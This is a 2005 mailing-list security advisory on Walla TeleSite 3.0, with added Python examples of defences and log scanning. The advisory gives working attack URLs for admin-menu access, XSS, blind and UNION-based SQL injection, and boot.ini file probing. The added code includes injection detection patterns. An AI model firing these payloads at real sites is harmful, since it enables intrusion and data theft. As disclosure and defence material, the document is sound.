Walla TeleSite Multiple Vulnerabilities

From: sinneR (rafiware_at_bezeqint.net)
Date: 11/14/05

    To: <news@securiteam.com>, <bugs@securitytracker.com>, <bugtraq@securityfocus.com>, <Full-Disclosure@lists.grok.org.uk>, <firewall-wizards@honor.icsalabs.com>
    Date: Mon, 14 Nov 2005 17:58:14 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Walla TeleSite
    Vendors: http://www.walla.co.il
    Versions: 3.0 and prior
    Platforms: Windows (ISAPI; a few vulnerabilities apply to Linux too)
    Bug: Multiple Vulnerabilities
    Exploitation: Remote with browser
    Date: 13 Nov 2005
    Author: Rafi Nahum, Pokerface
    e-mail: rafiware@bezeqint.net
    web: Not Yet....but soon

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Walla TeleSite is a website content management CGI web application.
    It is very common among big Israeli websites. It is also used as a wrapper
    for all the website links. It is used by Walla.co.il and the Walla.com
    Network as well.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    =======
    2) Bugs
    =======

    The TeleSite wraps the website with templates and ids for all the links.
    The main navigation page ts.exe receives a parameter called 'tsurl' and it
    does not verify/limit the numbers it receives: for example it should accept
    0.22.1.0 if such a page exists, but it should not accept 0.1.0.0, because
    that leads to the administrator's private articles menu.

    In addition, input filtering is missing for the web pages' GET/POST/Cookie
    parameters. This is a "feature" the software lacks, which leads the web
    programmers using this content management engine to believe their
    parameters are filtered; they are not, and this leaves all their clients
    with Script and SQL Injections. It is obvious that an SQL Injection may lead
    to complete remote compromise of the website, and XSS to content spoofing,
    phishing, cookie stealing, D.O.S attacks and more.

    The TeleSite application also does not save its errors to itself, in an
    error.log or something similar; instead it informs the attacker of the
    local path of the files it could not open/access when the attacker tampers
    with the website parameters. A remote attacker can also enumerate all the
    files on the machine by supplying their full path to ts.cgi after the query
    string.
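As an added example (not part of the original advisory and not TeleSite's own code), the following Python simulates the parameter handling this section describes against a hypothetical in-memory table: a string-concatenated query that reacts differently to the '1'='1 / '1'='2 pair (the boolean oracle behind a blind injection), the parameterised query that does not, an HTML-escaped reflection of sug, and a format-plus-allowlist check on tsurl that refuses ids a role is not entitled to. The table contents, the role names and the allowed id sets are assumptions made for the example.

```python
import html
import re
import sqlite3

# Constructed sample data standing in for the TeleSite backend (hypothetical).
_conn = sqlite3.connect(":memory:")
_conn.execute("create table tours (id integer primary key, name text, region text)")
_conn.executemany("insert into tours (name, region) values (?, ?)",
                  [("aaa", "north"), ("eilat", "south"), ("galilee", "north")])

# Hypothetical allowlist: which tsurl section ids a role may open.
# 0.1.0.0 is the administrator's private articles menu named in the advisory.
TSURL_RE = re.compile(r"\d{1,4}(?:\.\d{1,4}){3}")
ALLOWED_TSURL = {
    "anonymous": {"0.22.1.0", "0.52.0.0"},
    "admin": {"0.1.0.0", "0.22.1.0", "0.52.0.0"},
}


def tsurl_allowed(tsurl, role="anonymous"):
    """Reject malformed ids first, then any id the role is not entitled to."""
    if not TSURL_RE.fullmatch(tsurl):
        return False
    return tsurl in ALLOWED_TSURL.get(role, set())


def vulnerable_search(sug):
    """String-concatenated query: the attacker's quote closes the literal,
    so the rest of the value is parsed as SQL."""
    sql = "select name from tours where name = '%s'" % sug
    return [row[0] for row in _conn.execute(sql)]


def safe_search(sug):
    """Parameterised query: the whole value is compared as data."""
    return [row[0] for row in _conn.execute(
        "select name from tours where name = ?", (sug,))]


def boolean_oracle(search, base="aaa"):
    """The advisory's PoC pair: if the '1'='1 and '1'='2 variants return
    different results, the parameter is being interpreted as SQL."""
    true_case = search(base + "' and '1'='1")
    false_case = search(base + "' and '1'='2")
    return true_case != false_case


def render_sug(sug):
    """Hardened reflection of the parameter into the search form."""
    return "<input name='sug' value='%s'>" % html.escape(sug, quote=True)


if __name__ == "__main__":
    print("concatenated query injectable:", boolean_oracle(vulnerable_search))
    print("parameterised query injectable:", boolean_oracle(safe_search))
    print("anonymous may open 0.1.0.0:", tsurl_allowed("0.1.0.0"))
    print(render_sug("aaa' <script>alert()</script>"))
```

The point of the allowlist is that tsurl is an object reference the server must authorise per session; checking only that it is well formed would still let an anonymous user walk to 0.1.0.0.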

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Articles Menu Access:
    --------------------------------
     http://host/ts.exe?tsurl=0.1.0.0

    Cross Site Scripting - XSS:
    --------------------------------------

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<script>alert()</script>

    Blind SQL Injection:
    -----------------------------
     Proof Of Concept:

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2

     Exploitation:

    http://host/ts.exe?tsurl=0.52.0.0&tsstmplt=search_tour&sug=%EF'%20or%201=1%20union%20all%20select%20top%201%20null,null,null,null,null,null,null,null,null,'nuli','zulu','papa','qqq','rar','ewe',table_name,'asd','ttt','werwr','ryy','poo','polo','nike'%20from%20information_schema.columns--

    Local Path Disclosure:
    -------------------------------
     D:\TeleSite\online\templates\\example\sections\header

    Local File Enumeration:
    ---------------------------------
     http://host/ts.cgi?c:\boot.ini
     http://host/ts.cgi?c:\boot1.ini
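For the detection side, an added example that is not from the advisory: a Python scanner over IIS-style access log lines that flags each request pattern listed in this section (the admin menu id in tsurl, script tags in sug, the boolean-blind true/false pair, and an absolute path handed to ts.cgi). The log layout and every sample line are constructed for the example; the absolute-path rule also covers Unix paths, going slightly beyond the Windows-only PoC above.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Constructed sample log (not from any real server), simplified W3C layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2005-11-13 17:58:01 192.0.2.10 GET /ts.exe tsurl=0.22.1.0 200
2005-11-13 17:58:05 192.0.2.10 GET /ts.exe tsurl=0.1.0.0 200
2005-11-13 17:58:09 192.0.2.10 GET /ts.exe tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20<script>alert()</script> 200
2005-11-13 17:58:12 192.0.2.10 GET /ts.exe tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='1 200
2005-11-13 17:58:13 192.0.2.10 GET /ts.exe tsurl=0.52.0.0&tsstmplt=search_tour&sug=%61%61%61'%20and%20'1'='2 200
2005-11-13 17:58:20 192.0.2.10 GET /ts.cgi c:\\boot.ini 500
2005-11-13 17:58:21 192.0.2.10 GET /ts.cgi c:\\boot1.ini 500
2005-11-13 17:59:00 198.51.100.7 GET /ts.exe tsurl=0.52.0.0&tsstmplt=search_tour&sug=eilat 200
"""

# Section ids the advisory identifies as administrator-only (assumed list).
ADMIN_TSURL = {"0.1.0.0"}
XSS_RE = re.compile(r"<\s*script|javascript:", re.I)
SQLI_RE = re.compile(r"'\s*(and|or|union)\b|\bunion\s+(all\s+)?select\b|--\s*$", re.I)
ABS_PATH_RE = re.compile(r"^([a-z]:\\|/)", re.I)   # c:\... or /etc/...


def classify(line):
    """Return the list of attack tags matching one log line ([] if clean)."""
    fields = line.split(" ")
    if len(fields) != 7:
        return []
    _date, _time, _cip, _method, stem, query, _status = fields
    tags = []
    raw_query = "" if query == "-" else unquote(query)
    # ts.cgi?<full path>: the file enumeration primitive from the advisory.
    if stem.lower().endswith("/ts.cgi") and ABS_PATH_RE.match(raw_query):
        tags.append("file-enumeration")
    # Decode each parameter and test it individually.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "tsurl" and value in ADMIN_TSURL:
            tags.append("admin-menu-access")
        if XSS_RE.search(value):
            tags.append("xss")
        if SQLI_RE.search(value):
            tags.append("sqli")
    return list(dict.fromkeys(tags))   # dedupe, keep first-seen order


def scan(log_text):
    """Return one event per flagged line: time, source ip, stem and tags."""
    events = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        tags = classify(line)
        if tags:
            fields = line.split(" ")
            events.append({"time": fields[1], "ip": fields[2],
                           "stem": fields[4], "tags": tags})
    return events


def repeated_sqli_sources(events, minimum=2):
    """Blind injection is probed in pairs (the '1'='1 / '1'='2 PoC), so a
    source with two or more sqli hits is worth an alert on its own."""
    counts = Counter(e["ip"] for e in events if "sqli" in e["tags"])
    return {ip for ip, n in counts.items() if n >= minimum}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for event in found:
        print(event["time"], event["ip"], event["stem"], ",".join(event["tags"]))
    print("repeated sqli sources:", repeated_sqli_sources(found))
```

Decoding happens before matching so that the %61%61%61 and %20 encoding in the PoC URLs does not hide the payload from the patterns; a real deployment would also want the web server to stop disclosing the D:\TeleSite\... paths that make the file enumeration easy to confirm.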

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Rafi Nahum, Pokerface
    Greetings to The-Insider

    "Pokerface is the name, reputation follows."

